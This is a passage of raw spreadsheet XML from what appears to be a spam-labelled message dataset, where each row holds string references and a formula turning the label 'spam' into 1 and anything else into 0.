    <row r="4571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4571" t="s">
        <v>9568</v>
      </c>
      <c r="B4571" t="s">
        <v>5297</v>
      </c>
      <c r="C4571" s="1">
        <f>IF(B4571="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4572" t="s">
        <v>9569</v>
      </c>
      <c r="B4572" t="s">
        <v>5294</v>
      </c>
      <c r="C4572" s="1">
        <f>IF(B4572="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4573" t="s">
        <v>9570</v>
      </c>
      <c r="B4573" t="s">
        <v>5294</v>
      </c>
      <c r="C4573" s="1">
        <f>IF(B4573="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4574" t="s">
        <v>9571</v>
      </c>
      <c r="B4574" t="s">
        <v>5297</v>
      </c>
      <c r="C4574" s="1">
        <f>IF(B4574="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4575" t="s">
        <v>9572</v>
      </c>
      <c r="B4575" t="s">
        <v>5294</v>
      </c>
      <c r="C4575" s="1">
        <f>IF(B4575="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4576" t="s">
        <v>9573</v>
      </c>
      <c r="B4576" t="s">
        <v>5294</v>
      </c>
      <c r="C4576" s="1">
        <f>IF(B4576="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4577" t="s">
        <v>9574</v>
      </c>
      <c r="B4577" t="s">
        <v>5297</v>
      </c>
      <c r="C4577" s="1">
        <f>IF(B4577="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4578" t="s">
        <v>9575</v>
      </c>
      <c r="B4578" t="s">
        <v>5297</v>
      </c>
      <c r="C4578" s="1">
        <f>IF(B4578="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4579" t="s">
        <v>9576</v>
      </c>
      <c r="B4579" t="s">
        <v>5297</v>
      </c>
      <c r="C4579" s="1">
        <f>IF(B4579="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4580" t="s">
        <v>9577</v>
      </c>
      <c r="B4580" t="s">
        <v>5294</v>
      </c>
      <c r="C4580" s="1">
        <f>IF(B4580="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4581" t="s">
        <v>9578</v>
      </c>
      <c r="B4581" t="s">
        <v>5294</v>
      </c>
      <c r="C4581" s="1">
        <f>IF(B4581="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4582" t="s">
        <v>9579</v>
      </c>
      <c r="B4582" t="s">
        <v>5294</v>
      </c>
      <c r="C4582" s="1">
        <f>IF(B4582="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4583" t="s">
        <v>9580</v>
      </c>
      <c r="B4583" t="s">
        <v>5294</v>
      </c>
      <c r="C4583" s="1">
        <f>IF(B4583="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4584" t="s">
        <v>5877</v>
      </c>
      <c r="B4584" t="s">
        <v>5297</v>
      </c>
      <c r="C4584" s="1">
        <f>IF(B4584="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4585" t="s">
        <v>9581</v>
      </c>
      <c r="B4585" t="s">
        <v>5294</v>
      </c>
      <c r="C4585" s="1">
        <f>IF(B4585="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4586" t="s">
        <v>9582</v>
      </c>
      <c r="B4586" t="s">
        <v>5297</v>
      </c>
      <c r="C4586" s="1">
        <f>IF(B4586="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4587" t="s">
        <v>8849</v>
      </c>
      <c r="B4587" t="s">
        <v>5297</v>
      </c>
      <c r="C4587" s="1">
        <f>IF(B4587="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4588" t="s">
        <v>9583</v>
      </c>
      <c r="B4588" t="s">
        <v>5294</v>
      </c>
      <c r="C4588" s="1">
        <f>IF(B4588="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4589" t="s">
        <v>9584</v>
      </c>
      <c r="B4589" t="s">
        <v>5294</v>
      </c>
      <c r="C4589" s="1">
        <f>IF(B4589="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4590" t="s">
        <v>9585</v>
      </c>
      <c r="B4590" t="s">
        <v>5294</v>
      </c>
      <c r="C4590" s="1">
        <f>IF(B4590="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4591" t="s">
        <v>8483</v>
      </c>
      <c r="B4591" t="s">
        <v>5294</v>
      </c>
      <c r="C4591" s="1">
        <f>IF(B4591="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4592" t="s">
        <v>7308</v>
      </c>
      <c r="B4592" t="s">
        <v>5297</v>
      </c>
      <c r="C4592" s="1">
        <f>IF(B4592="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4593" t="s">
        <v>9586</v>
      </c>
      <c r="B4593" t="s">
        <v>5294</v>
      </c>
      <c r="C4593" s="1">
        <f>IF(B4593="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4594" t="s">
        <v>9587</v>
      </c>
      <c r="B4594" t="s">
        <v>5294</v>
      </c>
      <c r="C4594" s="1">
        <f>IF(B4594="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4595" t="s">
        <v>9588</v>
      </c>
      <c r="B4595" t="s">
        <v>5294</v>
      </c>
      <c r="C4595" s="1">
        <f>IF(B4595="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4596" t="s">
        <v>9589</v>
      </c>
      <c r="B4596" t="s">
        <v>5294</v>
      </c>
      <c r="C4596" s="1">
        <f>IF(B4596="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4597" t="s">
        <v>9590</v>
      </c>
      <c r="B4597" t="s">
        <v>5294</v>
      </c>
      <c r="C4597" s="1">
        <f>IF(B4597="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4598" t="s">
        <v>9591</v>
      </c>
      <c r="B4598" t="s">
        <v>5294</v>
      </c>
      <c r="C4598" s="1">
        <f>IF(B4598="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4599" t="s">
        <v>9592</v>
      </c>
      <c r="B4599" t="s">
        <v>5294</v>
      </c>
      <c r="C4599" s="1">
        <f>IF(B4599="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4600" t="s">
        <v>9593</v>
      </c>
      <c r="B4600" t="s">
        <v>5294</v>
      </c>
      <c r="C4600" s="1">
        <f>IF(B4600="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4601" t="s">
        <v>9594</v>
      </c>
      <c r="B4601" t="s">
        <v>5294</v>
      </c>
      <c r="C4601" s="1">
        <f>IF(B4601="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4602" t="s">
        <v>9595</v>
      </c>
      <c r="B4602" t="s">
        <v>5297</v>
      </c>
      <c r="C4602" s="1">
        <f>IF(B4602="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4603" t="s">
        <v>9596</v>
      </c>
      <c r="B4603" t="s">
        <v>5294</v>
      </c>
      <c r="C4603" s="1">
        <f>IF(B4603="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4604" t="s">
        <v>9597</v>
      </c>
      <c r="B4604" t="s">
        <v>5294</v>
      </c>
      <c r="C4604" s="1">
        <f>IF(B4604="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4605" t="s">
        <v>9598</v>
      </c>
      <c r="B4605" t="s">
        <v>5294</v>
      </c>
      <c r="C4605" s="1">
        <f>IF(B4605="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4606" t="s">
        <v>9599</v>
      </c>
      <c r="B4606" t="s">
        <v>5294</v>
      </c>
      <c r="C4606" s="1">
        <f>IF(B4606="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4607" t="s">
        <v>9600</v>
      </c>
      <c r="B4607" t="s">
        <v>5294</v>
      </c>
      <c r="C4607" s="1">
        <f>IF(B4607="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4608" t="s">
        <v>9601</v>
      </c>
      <c r="B4608" t="s">
        <v>5294</v>
      </c>
      <c r="C4608" s="1">
        <f>IF(B4608="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4609" t="s">
        <v>9602</v>
      </c>
      <c r="B4609" t="s">
        <v>5294</v>
      </c>
      <c r="C4609" s="1">
        <f>IF(B4609="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4610" t="s">
        <v>9603</v>
      </c>
      <c r="B4610" t="s">
        <v>5294</v>
      </c>
      <c r="C4610" s="1">
        <f>IF(B4610="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4611" t="s">
        <v>9604</v>
      </c>
      <c r="B4611" t="s">
        <v>5294</v>
      </c>
      <c r="C4611" s="1">
        <f>IF(B4611="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4612" t="s">
        <v>9605</v>
      </c>
      <c r="B4612" t="s">
        <v>5294</v>
      </c>
      <c r="C4612" s="1">
        <f>IF(B4612="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4613" t="s">
        <v>9606</v>
      </c>
      <c r="B4613" t="s">
        <v>5294</v>
      </c>
      <c r="C4613" s="1">
        <f>IF(B4613="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4614" t="s">
        <v>9607</v>
      </c>
      <c r="B4614" t="s">
        <v>5294</v>
      </c>
      <c r="C4614" s="1">
        <f>IF(B4614="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4615" t="s">
        <v>9608</v>
      </c>
      <c r="B4615" t="s">
        <v>5294</v>
      </c>
      <c r="C4615" s="1">
        <f>IF(B4615="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4616" t="s">
        <v>9609</v>
      </c>
      <c r="B4616" t="s">
        <v>5297</v>
      </c>
      <c r="C4616" s="1">
        <f>IF(B4616="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4617" t="s">
        <v>9610</v>
      </c>
      <c r="B4617" t="s">
        <v>5294</v>
      </c>
      <c r="C4617" s="1">
        <f>IF(B4617="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4618" t="s">
        <v>9611</v>
      </c>
      <c r="B4618" t="s">
        <v>5294</v>
      </c>
      <c r="C4618" s="1">
        <f>IF(B4618="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4619" t="s">
        <v>9612</v>
      </c>
      <c r="B4619" t="s">
        <v>5294</v>
      </c>
      <c r="C4619" s="1">
        <f>IF(B4619="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4620" t="s">
        <v>9613</v>
      </c>
      <c r="B4620" t="s">
        <v>5294</v>
      </c>
      <c r="C4620" s="1">
        <f>IF(B4620="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4621" t="s">
        <v>9614</v>
      </c>
      <c r="B4621" t="s">
        <v>5294</v>
      </c>
      <c r="C4621" s="1">
        <f>IF(B4621="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4622" t="s">
        <v>9615</v>
      </c>
      <c r="B4622" t="s">
        <v>5294</v>
      </c>
      <c r="C4622" s="1">
        <f>IF(B4622="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4623" t="s">
        <v>9616</v>
      </c>
      <c r="B4623" t="s">
        <v>5294</v>
      </c>
      <c r="C4623" s="1">
        <f>IF(B4623="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4624" t="s">
        <v>9617</v>
      </c>
      <c r="B4624" t="s">
        <v>5294</v>
      </c>
      <c r="C4624" s="1">
        <f>IF(B4624="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4625" t="s">
        <v>9618</v>
      </c>
      <c r="B4625" t="s">
        <v>5294</v>
      </c>
      <c r="C4625" s="1">
        <f>IF(B4625="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4626" t="s">
        <v>9619</v>
      </c>
      <c r="B4626" t="s">
        <v>5294</v>
      </c>
      <c r="C4626" s="1">
        <f>IF(B4626="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4627" t="s">
        <v>9620</v>
      </c>
      <c r="B4627" t="s">
        <v>5294</v>
      </c>
      <c r="C4627" s="1">
        <f>IF(B4627="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4628" t="s">
        <v>5389</v>
      </c>
      <c r="B4628" t="s">
        <v>5297</v>
      </c>
      <c r="C4628" s="1">
        <f>IF(B4628="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4629" t="s">
        <v>9621</v>
      </c>
      <c r="B4629" t="s">
        <v>5297</v>
      </c>
      <c r="C4629" s="1">
        <f>IF(B4629="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4630" t="s">
        <v>9622</v>
      </c>
      <c r="B4630" t="s">
        <v>5294</v>
      </c>
      <c r="C4630" s="1">
        <f>IF(B4630="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4631" t="s">
        <v>9623</v>
      </c>
      <c r="B4631" t="s">
        <v>5294</v>
      </c>
      <c r="C4631" s="1">
        <f>IF(B4631="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4632" t="s">
        <v>9624</v>
      </c>
      <c r="B4632" t="s">
        <v>5294</v>
      </c>
      <c r="C4632" s="1">
        <f>IF(B4632="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4633" t="s">
        <v>5876</v>
      </c>
      <c r="B4633" t="s">
        <v>5294</v>
      </c>
      <c r="C4633" s="1">
        <f>IF(B4633="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4634" t="s">
        <v>9625</v>
      </c>
      <c r="B4634" t="s">
        <v>5294</v>
      </c>
      <c r="C4634" s="1">
        <f>IF(B4634="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4635" t="s">
        <v>9626</v>
      </c>
      <c r="B4635" t="s">
        <v>5294</v>
      </c>
      <c r="C4635" s="1">
        <f>IF(B4635="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4636" t="s">
        <v>9627</v>
      </c>
      <c r="B4636" t="s">
        <v>5294</v>
      </c>
      <c r="C4636" s="1">
        <f>IF(B4636="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4637" t="s">
        <v>9628</v>
      </c>
      <c r="B4637" t="s">
        <v>5294</v>
      </c>
      <c r="C4637" s="1">
        <f>IF(B4637="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4638" t="s">
        <v>6539</v>
      </c>
      <c r="B4638" t="s">
        <v>5294</v>
      </c>
      <c r="C4638" s="1">
        <f>IF(B4638="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4639" t="s">
        <v>9629</v>
      </c>
      <c r="B4639" t="s">
        <v>5294</v>
      </c>
      <c r="C4639" s="1">
        <f>IF(B4639="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4640" t="s">
        <v>9630</v>
      </c>
      <c r="B4640" t="s">
        <v>5294</v>
      </c>
      <c r="C4640" s="1">
        <f>IF(B4640="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4641" t="s">
        <v>9631</v>
      </c>
      <c r="B4641" t="s">
        <v>5294</v>
      </c>
      <c r="C4641" s="1">
        <f>IF(B4641="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4642" t="s">
        <v>9632</v>
      </c>
      <c r="B4642" t="s">
        <v>5294</v>
      </c>
      <c r="C4642" s="1">
        <f>IF(B4642="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4643" t="s">
        <v>9633</v>
      </c>
      <c r="B4643" t="s">
        <v>5297</v>
      </c>
      <c r="C4643" s="1">
        <f>IF(B4643="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4644" t="s">
        <v>9634</v>
      </c>
      <c r="B4644" t="s">
        <v>5294</v>
      </c>
      <c r="C4644" s="1">
        <f>IF(B4644="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4645" t="s">
        <v>5490</v>
      </c>
      <c r="B4645" t="s">
        <v>5294</v>
      </c>
      <c r="C4645" s="1">
        <f>IF(B4645="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4646" t="s">
        <v>9635</v>
      </c>
      <c r="B4646" t="s">
        <v>5294</v>
      </c>
      <c r="C4646" s="1">
        <f>IF(B4646="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4647" t="s">
        <v>9636</v>
      </c>
      <c r="B4647" t="s">
        <v>5297</v>
      </c>
      <c r="C4647" s="1">
        <f>IF(B4647="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4648" t="s">
        <v>9637</v>
      </c>
      <c r="B4648" t="s">
        <v>5294</v>
      </c>
      <c r="C4648" s="1">
        <f>IF(B4648="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4649" t="s">
        <v>9638</v>
      </c>
      <c r="B4649" t="s">
        <v>5294</v>
      </c>
      <c r="C4649" s="1">
        <f>IF(B4649="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4650" t="s">
        <v>8893</v>
      </c>
      <c r="B4650" t="s">
        <v>5294</v>
      </c>
      <c r="C4650" s="1">
        <f>IF(B4650="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4651" t="s">
        <v>9639</v>
      </c>
      <c r="B4651" t="s">
        <v>5294</v>
      </c>
      <c r="C4651" s="1">
        <f>IF(B4651="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4652" t="s">
        <v>9640</v>
      </c>
      <c r="B4652" t="s">
        <v>5297</v>
      </c>
      <c r="C4652" s="1">
        <f>IF(B4652="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4653" t="s">
        <v>9641</v>
      </c>
      <c r="B4653" t="s">
        <v>5294</v>
      </c>
      <c r="C4653" s="1">
        <f>IF(B4653="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4654" t="s">
        <v>9642</v>
      </c>
      <c r="B4654" t="s">
        <v>5294</v>
      </c>
      <c r="C4654" s="1">
        <f>IF(B4654="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4655" t="s">
        <v>7164</v>
      </c>
      <c r="B4655" t="s">
        <v>5294</v>
      </c>
      <c r="C4655" s="1">
        <f>IF(B4655="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4656" t="s">
        <v>9643</v>
      </c>
      <c r="B4656" t="s">
        <v>5294</v>
      </c>
      <c r="C4656" s="1">
        <f>IF(B4656="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4657" t="s">
        <v>9644</v>
      </c>
      <c r="B4657" t="s">
        <v>5294</v>
      </c>
      <c r="C4657" s="1">
        <f>IF(B4657="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4658" t="s">
        <v>9645</v>
      </c>
      <c r="B4658" t="s">
        <v>5297</v>
      </c>
      <c r="C4658" s="1">
        <f>IF(B4658="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4659" t="s">
        <v>9646</v>
      </c>
      <c r="B4659" t="s">
        <v>5294</v>
      </c>
      <c r="C4659" s="1">
        <f>IF(B4659="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4660" t="s">
        <v>5590</v>
      </c>
      <c r="B4660" t="s">
        <v>5294</v>
      </c>
      <c r="C4660" s="1">
        <f>IF(B4660="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4661" t="s">
        <v>9647</v>
      </c>
      <c r="B4661" t="s">
        <v>5294</v>
      </c>
      <c r="C4661" s="1">
        <f>IF(B4661="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4662" t="s">
        <v>9648</v>
      </c>
      <c r="B4662" t="s">
        <v>5294</v>
      </c>
      <c r="C4662" s="1">
        <f>IF(B4662="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4663" t="s">
        <v>9649</v>
      </c>
      <c r="B4663" t="s">
        <v>5294</v>
      </c>
      <c r="C4663" s="1">
        <f>IF(B4663="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4664" t="s">
        <v>9650</v>
      </c>
      <c r="B4664" t="s">
        <v>5294</v>
      </c>
      <c r="C4664" s="1">
        <f>IF(B4664="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4665" t="s">
        <v>9651</v>
      </c>
      <c r="B4665" t="s">
        <v>5294</v>
      </c>
      <c r="C4665" s="1">
        <f>IF(B4665="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4666" t="s">
        <v>9652</v>
      </c>
      <c r="B4666" t="s">
        <v>5294</v>
      </c>
      <c r="C4666" s="1">
        <f>IF(B4666="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4667" t="s">
        <v>9653</v>
      </c>
      <c r="B4667" t="s">
        <v>5294</v>
      </c>
      <c r="C4667" s="1">
        <f>IF(B4667="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4668" t="s">
        <v>9654</v>
      </c>
      <c r="B4668" t="s">
        <v>5294</v>
      </c>
      <c r="C4668" s="1">
        <f>IF(B4668="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4669" t="s">
        <v>9655</v>
      </c>
      <c r="B4669" t="s">
        <v>5294</v>
      </c>
      <c r="C4669" s="1">
        <f>IF(B4669="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4670" t="s">
        <v>9656</v>
      </c>
      <c r="B4670" t="s">
        <v>5294</v>
      </c>
      <c r="C4670" s="1">
        <f>IF(B4670="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4671" t="s">
        <v>9657</v>
      </c>
      <c r="B4671" t="s">
        <v>5294</v>
      </c>
      <c r="C4671" s="1">
        <f>IF(B4671="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4672" t="s">
        <v>9658</v>
      </c>
      <c r="B4672" t="s">
        <v>5294</v>
      </c>
      <c r="C4672" s="1">
        <f>IF(B4672="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4673" t="s">
        <v>9659</v>
      </c>
      <c r="B4673" t="s">
        <v>5297</v>
      </c>
      <c r="C4673" s="1">
        <f>IF(B4673="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4674" t="s">
        <v>9660</v>
      </c>
      <c r="B4674" t="s">
        <v>5294</v>
      </c>
      <c r="C4674" s="1">
        <f>IF(B4674="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
